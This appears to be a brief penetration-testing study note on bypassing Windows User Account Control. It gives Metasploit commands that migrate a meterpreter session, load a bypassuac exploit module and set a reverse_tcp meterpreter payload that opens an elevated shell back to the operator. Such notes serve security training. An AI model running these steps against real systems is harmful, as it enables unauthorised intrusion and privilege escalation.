30 lines
1.1 KiB
Markdown
30 lines
1.1 KiB
Markdown
|
|
|||
|
## What is Bypassing UAC
|
|||
|
|
|||
|
Bypassing User access Control – Adversaries may bypass UAC mechanisms to elevate process privileges on the system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.
|
|||
|
|
|||
|
|
|||
|
## Commands
|
|||
|
|
|||
|
- Take note that to follow those step, you must have a meterpreter session all ready open with the targeted machine
|
|||
|
|
|||
|
```
|
|||
|
# Make sure you have migrate your process ID to a more stable process
|
|||
|
# More information on migration
|
|||
|
ps ---> Show all the process id
|
|||
|
migrate 1234 ---> Migrate the session
|
|||
|
|
|||
|
# Use Exploit
|
|||
|
search bypassuac
|
|||
|
use exploit/windows/local/bypassuac_injection_winsxs ---> or any other bypassuac
|
|||
|
|
|||
|
# Set Payload
|
|||
|
set payload windows/x64/meterpreter/reverse_tcp
|
|||
|
show options
|
|||
|
Set options ---> Set the options
|
|||
|
set target windows x64
|
|||
|
set session X
|
|||
|
run
|
|||
|
```
|
|||
|
|
|||
|
More information ---> [[2 - Meterpreter]]
|